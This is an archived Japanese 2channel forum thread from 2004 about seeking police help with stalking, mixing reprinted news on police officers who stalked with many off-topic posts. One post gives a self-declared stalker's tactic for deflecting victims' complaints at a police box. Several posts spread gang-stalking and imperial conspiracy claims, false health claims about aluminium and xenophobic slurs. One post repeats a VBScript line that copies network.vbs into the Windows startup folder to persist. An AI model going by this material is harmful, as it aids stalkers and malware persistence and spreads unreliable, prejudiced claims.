5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警察で】 ストーカー相談 【裁く正統派】

1 :名無しピーポ君:04/01/17 11:27
最近ではストーカー専門の業者も増える世の中。
警察、法律家が正統派の立場でストーカーに立ち向かうことができるのか?
相談、対策所です。

尚、ネトラン厨&固着も度が過ぎるとストーカーです。する奴はされる立場。
逝ってみよう!

2 :名無しピーポ君:04/01/17 13:59
けいさつは、なぜ、じょしこうせいにチンポみせるですか?
けいさつは、なぜ、こうばんでスカートのなかを、とうさつするですか?
けいさつは、なぜ、でんしゃで17さいしょうねんのぱんつのなかに、てをいれるですか?
もしかして、ぶろうくん・ういんどう・せおりぃのいっかんですか?

3 :名無しピーポ君:04/01/17 14:02
【警察が】 スカート盗撮相談 【覗く正統派】

スレタイみて、一瞬、こう読んでしまったのは、漏れだけ?

4 :名無しピーポ君:04/01/17 16:30
>>2>>3
ねんちゃくばかは、なぜ、おなじことになんかげつもねんちゃくしつづけるですか?
ねんちゃくばかは、なぜ、しんやにしかかきこみできないするですか?
ねんちゃくばかは、なぜ、しごともせずにちゃんねるざんまいでせいかつできるですか?
もしかして、ばかはしななきゃわからないをじっせんしてるですか?

>>3
間違いなくおまえだけだよ。

5 :  :04/01/17 17:47
集団ストーカー対策を厳しく取り締まって欲しい。

http://tmp2.2ch.net/test/read.cgi/company/1070894427/l50

かなり被害者いる。

6 : :04/01/17 17:54
ストーカーしてる人間って、ニホンジンない奴多し。
日本を不安にさせるための仕事請け負い。
それを依頼する企業・法人も問題あり。 

7 :名無しピーポ君:04/01/18 22:21
>>6
正直、ガイジソの方がストーキング多し、ジェラシーやひがみの強さや象徴
日本の場合は年老いているくせに妙にDQNな感じの奴や仕事や人間的な立場や人間関係が重なりストーキング好意

 な ん か し ら ん け ど 逆 恨 み し た 糞 D Q N と か な 。

そこで見てるおまいだよ。

正直、警察には逆恨みが怖くて相談できん。
企業や警察に相談するにしろ相談する現場を見たれたら逆恨みがひどくなる事例あり

8 :名無しピーポ君:04/01/18 22:23
ストーキングで被害に遭うかはしらないところ。
警察が盗難車の発見に結び付かないのと同じ。

興味深い、ageとく。

9 :ストーカー:04/01/20 00:11
ヒヒヒー俺ストーカーなんだけどよ。松戸市内の交番はちょろいね。対象者の家の前に立ってて
本人だの家族とかが「あなた、私(の家族)をつけ廻してるひとでしょ!!」などと言って
証拠のシナを見せられたりしたら、こっちはすかさず「警察行こ警察」と、強気にでるんだよ。
そうすれば向こうは被害者ぶっているから、それじゃ行こうじゃないかと言うことに
なるので、交番へ行き交番入ったら相手より先にすかさず「この人が○○(←見せられた
証拠のシナ)見せて人の事ストーカーだとかいうんですよ。」と興奮気味に言えば
それで自分はナンノおとがめなしで帰してもらえる。ちょろいちょろい
警察に変人扱いされて注意うけるのは向こうの方
日ヒヒ、日本はストーカー天国だね。


10 :名無しピーポ君:04/01/20 02:06
ま、警察官がストーカーしても、怒られるだけで罪には問われない世の中ですから・・・

福岡中央署の巡査部長(55)が今年六月、福岡市博多区の歓楽街・中洲の風俗店勤務の
女性(25)に執拗に結婚を迫り、 嫌がる女性が店を変わっても店に押し掛け、「どこに隠し
たのか。しらないことはないやろ」「俺 は暴力団も知っているぞ」などと怒鳴るなど、ストー
カー行為をくり返していたことが、今月一日わかった。
対応に困った店側が、同署に相談するが、県警監察室官は「警察官の風俗店通いは倫理
的によくない」と口頭注意だけにとどめていた。
警官は、月に五、六回の割合で女性の勤める風俗店に通い詰め、求婚。女性に別の男性
との結婚を理由に断られたが、その後も店に通い続け求婚を迫り続けたという。
(西日本新聞)


11 :名無しピーポ君:04/01/20 03:15
ストーカーは心理の上でも不安定になることが多いと思う
精神病の診断書も宛て付けと言えば宛て付けだけど患者はみんな同じようなケースにやられてる、もちろん自覚症がない状態で
街や俺んちの前をブラブラ歩いたり自転車こいだりするのは勝手だが近所住民とは挨拶もして顔も名前も一致しますよ
K察はストーカーに対して対応しないし厳しすぎる罰も与えない、こんな世の中か・・・
やっぱKじゃ難しい、機関に相談して法律家と話せば気が晴れるかな
あと最近ホームセンターに売ってるセンサーライトもストーカーになるらしいよ

>>9
えーっと。宿題の作文ですか?

>>10
Kがストーキングしてしまった事例も数多くある
簡単な事例は交通違反などでしかもこの場合は複数犯になる(もちろん日本警察、警視庁)
免許取る前の教習所の段階から追っかけてたんだってさ

12 :名無しピーポ君:04/01/20 13:35
>>10
粘着カキコだけじゃ飽きたらず、古〜い記事を必死にコピペですか・・・。
質問していいですか?





  他 に す る こ と な い の ?





ヒッキーには昼も夜も休日も平日も関係ないか、やっぱ(ワラ

13 :名無しピーポ君:04/01/20 19:16
大阪府警の警部補がストーカー−−交際求め女性宅訪問、慰謝料100万円で示談

 大阪府警の警部補(51)が1997年ごろ、通勤途中に見かけた女性
にしつこく交際を迫っていたことが7日、分かった。女性が「ストーカー被
害に遭った」と地元警察署に相談して発覚し、警部補は当時の上司から
口頭注意を受けたが、上司らは監察室に報告していなかった。府警は
対応に問題があったとして処分する方針。女性側には慰謝料100万円
を支払い、示談していた。


 府警によると、この女性は40歳代で大阪府北部に在住。警部補は警
備部公安3課にいた97年秋ごろ、大阪市営地下鉄東梅田駅近くで女性
に声を掛けたほか、交際を求める手紙を2回手渡した。さらに同年12月
に2回、夜間に自宅を訪問し、貴金属を渡そうとした。女性は手紙などで
交際を断っていた。


 女性は翌98年7月、警部補のマイカーを見たことをきっかけに地元署
に相談。女性の上司と警部補の上司らが、示談話を進めたという。警部
補は昨春、大阪市内の警察署に異動した。

14 :名無しピーポ君:04/01/20 19:17
女性にストーカー行為容疑、巡査長を書類送検−−新潟県警

 新潟県警は15日、新潟東署刑事1課、斎藤義文巡査長(35)=同県西川
町=をストーカー規制法違反(性的羞恥(しゅうち)心を害するつきまとい)の疑
いで新潟地検に書類送検するとともに、停職3カ月の懲戒処分にした。また、
斎藤巡査長のストーカー行為を知りながら本部長に報告せず、適切な処置を
怠ったなどとして、国家公安委員会と県警は同日、猪又勝署長と笠原銀一郎
副署長を戒告処分、同署の刑事官と刑事1課長を本部長訓戒処分とした。

 調べでは、斎藤巡査長は1998年ごろに知り合った新潟市に住む20代の
独身女性に対し、昨年11〜12月の間、5回にわたって女性宅のポストにみ
だらな内容のメモ書きなどを入れた疑い。昨年2月ごろから付きまとっていた
らしい。

15 :名無しピーポ君:04/01/20 19:19
警視庁巡査部長がストーカー行為、書類送検−−神奈川県警・泉署

 酔って後をつけた女性の勤務先に無断で侵入したとして、神奈川県
警泉署は7日、横浜市泉区内に住む警視庁目黒署地域課の巡査部長
(51)を建造物侵入容疑で横浜地検に書類送検した。

 調べでは、巡査部長は先月23日午後9時40分ごろ、同市泉区中田
西1のスーパーマーケット店内に、社員通用口から無断で侵入した疑
い。巡査部長は同僚と酒を飲んで別れた後、同店に勤める女性3人に
声を掛け、飲食に誘ったが断られたため、約100メートルほど後をつ
け、通用口から逃げ込んだ3人を追って店内に入ったという。巡査部長
に気付いた男性店員が通報、泉署員に現行犯逮捕された。


16 :名無しピーポ君:04/01/20 20:31
桶川ストーカー殺人事件って
ストーカーでなくて営業拉致集団の組織的犯罪で
それの隠蔽にしか見えないんだけど・・・。

17 :名無しピーポ君:04/01/20 20:52
>>10
>>13
>>14
>>15
警察官のストーカー事件ですか。
ここでも神奈川県警が出てきますね。

18 :名無しピーポ君:04/01/20 21:26
>>14
>>15
15日って? 7日って?
未来予測記事ですか? それとも古い記事ですか?
いずれにしろ、キミって「 馬 鹿 」ですか?


19 :名無しピーポ君:04/01/21 18:51
イズナオトシとは
相手の懐に取り憑き自分もろとも敵を落す技である。

20 :名無しピーポ君:04/01/21 18:54
パシリの下っ端の「下忍」が忍び込んでいるか
「クサ(大麻洗脳)」でも使われたのだろうか・・・。

21 :名無しピーポ君:04/01/22 00:43
つーか日常で





         <●>  <●>
            __


                     を使われたら対応できない罠

22 :名無しピーポ君:04/01/22 00:43
ずれたので逝ってきます

23 :名無しピーポ君:04/01/25 17:02
>>22
必死

24 :すれちがい?:04/01/26 10:50
「クサ(大麻洗脳)」って興味深く悲しいよね。

代々敵を見張るために人知れず潜入していた家系だったのだよ、とか
尊敬していた人がそうするように言っていた、とか
今思いついた、とか 洗脳されることが「クサ」って言うのに

素敵な伝説が有ったような思いこみをしていて・・・。

25 :名無しピーポ君:04/01/26 10:56
忍者が集団ストーカーの犯人だと言うわけではなくて
忍者の騙しの手法にはそういうモノがあって
組織犯罪に(冗談交じりでも)使用されていたら
恐いなあ・・・。

と言うお話なのですよ。

26 :名無しピーポ君:04/01/26 17:33
>>25
それにしても今時忍者ってさあ・・・
そこでみているおまいですよ

27 :名無しピーポ君:04/01/28 20:07
忍者だけでは無いのですよ、
パプアニューギニアの「ゾンビパウダー」とかね。
軍医が持ち帰って成分分析してたら・・・とか思うと・・・。
毒物の犯罪は恐いですよ。

アルツハイマーの引き金になるアルミ成分が入っていたんじゃないかな?
そんなことが解れば発表されてるハズだろうと良く言われるけど
戦後傷ついて生き残る見込みの無かった身よりのない退役軍人の肉を
「軍の人から貰った肉」「軍から来た者」としてブラックマーケットへ
渡していた病院が大病院になって(※年寄りから聞いた噂)
その後の日本の税金を湯水のように喰っているんだもんな。

騙そうとしている本体であれば 発表するわけ無いんじゃないかな。

取り敢えず
なんでも疑うのが職業の人はアルミの炊飯器でご飯食べないで見てね。
(鎮痛剤成分のアルミを止めると痛覚が戻ってきて
色々痛かったり気持ち悪かったりするでしょうけれども。)


28 :名無しピーポ君:04/02/03 09:07
そもそも「忍者」とはなに?

29 :名無しピーポ君:04/02/03 16:17
妄想もついにここまで来ましたか
自分が盗聴してるのが相手に頼まれた探偵に見つかりそうになると
相手をストーカー呼ばわり
ますます罪が重くなるね
刑務所でも反省できないような勘違い野郎だね
たぶん死んでもバカは治らない

30 :名無しピーポ君:04/02/08 20:27
う〜む、ストカーかネカマか、そこのおまいですよ。

31 :名無しピーポ君:04/02/11 18:33
うんぬん

32 :名無しピーポ君:04/02/12 18:28
近所に「群馬の(豚)肉」とか温泉卵とか売ってると
何だか恐い今日この頃です。
戦後 軍者肉やら目玉が売られていたかも知れないと妄想してしまいます。
目玉は熱しても固くならないものですよね(マグロの目玉とか)・・・。

そう言う世代の人が「隣組の方針」の様に徒党を組んで
営業拉致(人身売買)ルートを確保してたとしたら 厄介ですよね?
そういうのも「ストーカー相談」出来るんでしょうか?

相談先は不意の放火やガス・細菌テロ、誹謗中傷の情報戦に強いんでしょうか?

33 :名無しピーポ君:04/02/15 03:50
age

34 :名無しピーポ君:04/02/15 06:11
東の話はよくわからん
 
西の場合は、奈良の車が多かった
皇族周辺に妙な取り巻きがいて伝承者が居てもおかしくは無い
藤のように絡む原はじめ、歴史とはそういうもんなんだろう

35 :名無しピーポ君:04/02/18 14:59
奈良ナンバー?

36 :名無しピーポ君:04/02/18 15:13
香具師興行師の集団語なら「奈良の車」は以下の通り。

奈良の車→並びの雪駄の皮
→隣の人に並んで立ち
新聞や週刊誌を使って視線を避けつつ作業する牛太郎(妓夫=客引)

37 :名無しピーポ君:04/02/18 15:25
「クサ(大麻?)」で
「政府が仕切っていた古の遊郭と同じモノなのです。」と洗脳して
六法を読んでいない警官に集団人権侵害幇助させるんでしょうか?

っていうか、天皇 怪しいよね。
何で江戸城跡地に住んでるんだよ?
ご褒美が何で「タバコ」?
日本のご褒美は米か土地か統治権に決まってるだろ?
タバコがご褒美なんて 朝鮮半島の人みたい。

38 :名無しピーポ君:04/02/18 15:32
天皇すり替え説を小耳に挟んだこともあるんだが
元々住んでいたところから引っ越してきた方がばれにくいだろうね

・・・スレとは関係ないけどさ。

39 :名無しピーポ君:04/02/18 15:48
>38
・・・地元の有栖川宮様の親しまれ度みたいなモノが無いんですけど。
(表だって言うと秘密警察に拉致されそうだったので誰も触れなかったようだ。)
今では もう有栖川の宮家は無いから ますます謎ですぞ?
・・・スレとは関係ないけどさ。


40 :名無しピーポ君:04/02/18 16:01
そういえば最近見ないなァ
カップ麺一年分とかチョコレート一年分とかのプレゼント。
・・・スレとは関係ないけどね。

41 :名無しピーポ君:04/02/19 13:24
天皇も万引きやストーカーしたら逮捕されるよね?
っていうか、侍従長とか側近が止めるよね?

侍従長ってナチスやキリスト原理主義者に洗脳されてないよね?
海外マフィアに「人権蹂躙は支配者の特権と大昔から決まっていますから」と
申し出られ 犯罪手引きを任せたりしたら 裁かれるよね?

自称天皇縁の団体の暗躍も許さないよね。

天皇縁の風習を名乗る暴力団員の悪行を手紙にしたためたら
それはそれは猛烈に咎めますよね?

42 :名無しピーポ君:04/02/19 13:36
天皇がもし朝鮮半島出身の人の子孫でもすり替えがあったとされる頃は
朝鮮は日本だったのではないだろうか?・・・だから日本人だよ。
それよか、当時のナチスとの繋がりの方が気になります。

海外の怪しげな自称宗教団体にストーカーされてても
警察で対応してくれるのかなあ。


43 :名無しピーポ君:04/02/22 19:43
>貧乏な親戚が子供(又は気が弱そうな血縁者)の人権を
>「華僑(?)」の人に売り渡して
>営業拉致や保険金搾取のために
>子供に薬物持ったり暗示を掛けたり 否定しまくって錯乱させたり
>他人に悪い噂をして孤立化させたりすることがある。※
>(「ダルマ」とも言うらしい。手足を切られる訳じゃないから残酷じゃないとか
>面倒じゃないとか思う人もいるようだ。しかし充分人権侵害である。)
>日本の警察は目撃者が騒いでも被害を受けた人が告発しないと動かない様だ。


>孤立させれば その人の人格を周囲の人に誤解させる事が出来る。
>たとえば
>「キチガイなので あの人が何かに襲われている話をしても信用しないで」
>と周囲に言い含めておけば
>本人の記憶がPTSDや麻酔ミスリ−ド、暗示で曖昧なうちは
>なにか犯罪に巻き込まれていて辛くても 第三者には推し量り様が無い。
>(暴力団の裏ビデオ制作や売春、人的賄賂用人材扱い等。
>犯罪者の犯罪を公務員等に見逃して貰ったり
>犯罪補助見返りとして人的賄賂に使われたりする。)

>血縁殺人鬼が 生前の被害者名義でコッソリ金を借りまくったあと
>「躾ようと思ったら死んでしまいました どうかしてました」と言って
>借金の相続権拒否したりしても
>被害者の人格を知る人がいなければ 殺人鬼に同情して許す人が居たりする。

44 :43:04/02/22 20:40
>日本の警察は目撃者が騒いでも被害を受けた人が告発しないと動かない様だ。

六法読んだらこういう場合告発が無くても捜査される(操作では無い)筈に
なっているのだが野放しらしく
未だに私の行く先で「あの人をココで働かせれば客が付く」(売春事務所要請)だの
放火先で「あの人が[=の]生い立ちのことで否を付けたからこうなった」と証言するだの
「背[セイ]が 良くないからだ」だの言いながら付いて来るみたいです。
風習がどうとか天皇がどうとか言ってくる人も居ます。

一網打尽にする決め手が見つから無いので
騒がしく無くなるまで
延々とペテン師に対する注意を促していくつもりです。 

45 :名無しピーポ君:04/02/22 20:47
警察OBに操作を任せてる事になっているそうですが そういうのって
「ココの管轄で(悪事を)働いていた者だが」とか言う薬物洗脳ペテン師を
OBと誤認識してませんか?

46 :名無しピーポ君:04/02/22 20:51
警察官に対する
犯罪補助要請ストーカーはしつこいですから気を付けて下さいね!

47 :名無しピーポ君:04/02/25 18:52
警察官による
下校中の女子児童を狙う犯罪のほうも気をつけて下さいね!

48 :名無しピーポ君:04/02/26 18:41
>>47
朝起きて専用ブラウザで巡回したんだけど、君の発言が一番下のスレ
がすごく多いね。どうして?
ちなみにこのスレもそうだったよ(爆

49 :集団ストーカーが被差別民をでっち上げ地位のある人に人的賄賂に使用?:04/03/16 20:06
大昔のことだが某遊園地アトラクション内で非常口から香具師興行師に拉致された。
香具師興行師(イエズスクルーズ?)のストーカーは
私のプロフィールを調べ上げているため、
遊園地の従業員は私の知り合いだと錯覚したのかも知れない。
その時は何もされなかったが周囲の人に「家族(華族)」と錯覚されたりした。
その時騒げなかったのは逆らうと
暴力団体が親に取り入って躾るといって就寝時に運び出され気道を塞がれたり
無防備な周囲の人のお宅に私の所為にだといって放火したり
名誉毀損な噂を勤め先に広めたりされて精神がまいってたから。
記憶が喪失してたらしいことは覚えていたが
ストーカーが「知り合いじゃない人」だと解って貰えなかった。

こんな風に 何か薬物を使って公務員も騙すような宗教を装った暴力団
(天皇とか遊郭風習とかユタとか宗教等と言っている。)に
車椅子を使って薬物拉致されたことがあるため
障害者に優しい設計が逆に恐怖の対象にだったりしました。
そして警察内部にOBとか侍従や公安の人のフリをして入り込んでいる様な気がした。
こんな事言ってると
精神異常者扱いされて 身籠もっても理由を付けられて掻爬されそうで
恐くて相談しにくかった。
保険金掛けられて路上でガスなど吸わされて自動車で轢かれてしまうかと思った。
癌保険掛けられた後 深夜にに看護婦の格好をした人に麻酔をかけられて運ばれ
どうも放射線治療室らしい場所に暫く閉じこめられたりしたのだが
麻酔で記憶がハッキリしないため事情が説明しづらい。

何かテレビでは「光に包まれた宇宙人拉致」番組やってたが
それは救急医療スタッフの格好をした拉致団体を瞳孔が開いた状態で
見たって事だと思うに至った。

50 :集団ストーカーが被差別民をでっち上げ地位のある人に人的賄賂に使用?:04/03/18 03:36
昨日小火を見た。
近くを通り過ぎるとき手前に居た人がノーリアクションだったので
思わず何もせずに通ってしまったが後でとても気になった。

小火の有った場所の周囲は道路整備が進んでいて
其処だけ残っている建物の 数十a外側スチール板状の塀の壁際で
雑草が枯れて吹き溜っている所で焚き火をしているかと思ったら小火だった。
小火の前の道路にバスが停まっていて(死角作り?)運転手らしき人が
右往左往していたのでタバコを落して出火したのだろうかと思い
バケツリレーでも始めるのかなと思った。
消防署に連絡が未だなら携帯電話で私が通報しようかなと思ったが結局しなかった。

帰りに消防署前を通ったが出動の気配はなかった。
もしも全焼していたら 地上げ屋の嫌がらせ放火というよりも 
「華僑」の人がよくやる手口のように保険金目当ての放火かも知れないと思った。

この地域には集団ストーカーが多いし
小火のあった所は大手会社研究所名目のリクエーション施設だったので
滅多な事は口に出せない(暗殺されそうだ)。
しかし何も言わなくても結局 気のふれた人のように言われたり
ユダヤ信者(キリスト原理主義者にとっての裏切り者)と決めつけられて
警察官と縁故関係に成りたがる人(人的賄賂か美人局役?)扱いされそうなので
ここに書いておくことにしました。
何で あの集団ストーカーの人達は
「性的接待をする人」と「売春婦」のどちらかを必ずやらないと死ぬと
私を脅していたのか未だに納得行かないです。
自ら選びそうになったら妨害された(←「達磨」と言うらしい。)ので
集団ストーカー一味の人に「選ばない所為で酷くされているんだ」と
宣って来られてもマッチポンプとしか思えません。

51 :集団ストーカーが被差別民をでっち上げ地位のある人に人的賄賂に使用?:04/03/18 03:47
判るように書かないと
私が殺されても交通事故か癌か自殺に分類されてしまいそうだが
判るように書くと名誉毀損なんだなあ。

そんなわけで判らないように書き込んでいるのだが
同じ手口で悪事を働いている人全員危なくしているなら まあ良しとするかな?

52 :50:04/03/23 11:56
全焼してませんでした。

一々騒ぐと電波さん扱いにされるから騒がなくてよかったのかとも思われるが
騒がない人しか通りかからなかったら全焼していた様な気がしてくるのでした。


53 :名無しピーポ君:04/04/01 18:53
漏れは知っている。
集団ストーカーが正統派になる場合を。
信じたい。

54 :名無しピーポ君:04/05/06 00:44
手をこまねいていればいるほど加害者はほくそえんでいるんだろう
市民生活が脅かされる大規模な犯罪がいつまで放置されるんだろうか
被害者の人生の時間は無限にある訳ではない。警察には対応を取って貰えないのか

55 :  :04/05/06 20:21
>54 同感
2chにもいろいろ書き込みあるよ

> :    :04/04/2 ??:?/ ID:\\\\\
>いい弁護士は悪質な探偵興信所をかかわらないように注意
>
>?? 名前:   :04/04/?? 1?:?5
>探偵 興信所が複数でストーカーをおこなっている
>被害者周辺でおかしなこと、ほのめかし、不法家宅侵入をやっている
>
>http://tmp2.2ch.net/test/read.cgi/company/1076111767

>多くの探偵が違法行為をしている

>こんなHPもある
>http://www.geocities.com/risutora_kousaku/index.html

友人も探偵興信所に自宅に不法侵入された
上記の
http://tmp2.2ch.net/test/read.cgi/company/1076111767

も最近荒らされた
 
違法行為をする探偵興信所が確実に存在する

弁護士の方、興信所の選定には気をつけて

56 :名無しピーポ君:04/05/20 10:21
furuchin takuma

57 :名無しピーポ君:04/05/25 15:09
youjyo waisetumokutekiryakusyu

58 :名無しピーポ君:04/05/25 17:57
白痴クソ=宅間巡査。

59 :名無しピーポ君:04/05/27 12:28
けど、自分がストーカーって気付いていない奴が捕まるんじゃないの?

捕まる奴:気付いていない
通報者 :気付いた
警察  :気付いていない

で、自称ストーカーは
自称スト:気付いている
通報者 :気付いていない
警察  :気付いていない

てことじゃないか?

60 :名無しピーポ君:04/05/27 14:13
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

61 :名無しピーポ君:04/05/27 14:18
警察自体がストーカーだから大丈夫じゃねえの?
やる気出せばのことだけど
きっとやる気ないだろうね。

正直、警察官はストーカーが怖いらしい
本音で言うと怖いから捜査がいやらしいです。
個人的に粘着していやがらせされるんだからもっともかな

おいおい警察が正統派なわけないだろw

62 :名無しピーポ君:04/05/27 14:39
お前ら害虫ダニ警察如きに、
あれだけ今まで良い品物を世に送り出して社会に貢献して来た三菱重光様を悪者扱いして、非難轟々の矛先を向け槍玉に上げる筋合いや資格は何処にも無いだろ!

三菱重工と言えば、お前らダニ害虫能無し低能下等動物の“警察”の為に態々、水陸両用車や装甲車や戦車など色々なハイテク車を作って来てくれていたのだぞ。お前ら警察はその事を忘れたのか?! この恩知らずめが!

お前ら警察こそは、何の生産性も能力の才能も創意工夫も無い、ゴロツキヤクザ以下の、ただ権力を振り回して暴れまわっているだけの、ギャング以下の害虫の蛆ダニではないか!
そんな無能低能害虫の“警察”が、こともあろうに天下の有力貢献会社★三菱重工様☆に対して、何偉そうに鬼の首取ったかのごとく、一人で得意になって悦に入っているのだよ。

お前ら警察の遣っている事といったら何時だって、無能で陳腐で杓子定規な形式張った、ルーチンワークばかりではないか! この能無し野郎が。

そんなの、夜郎自大で身の程知らずの、思い上がりのエゴもいい所だよ! 付け上がって得意に成るな、この能無し低能警察めが!

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)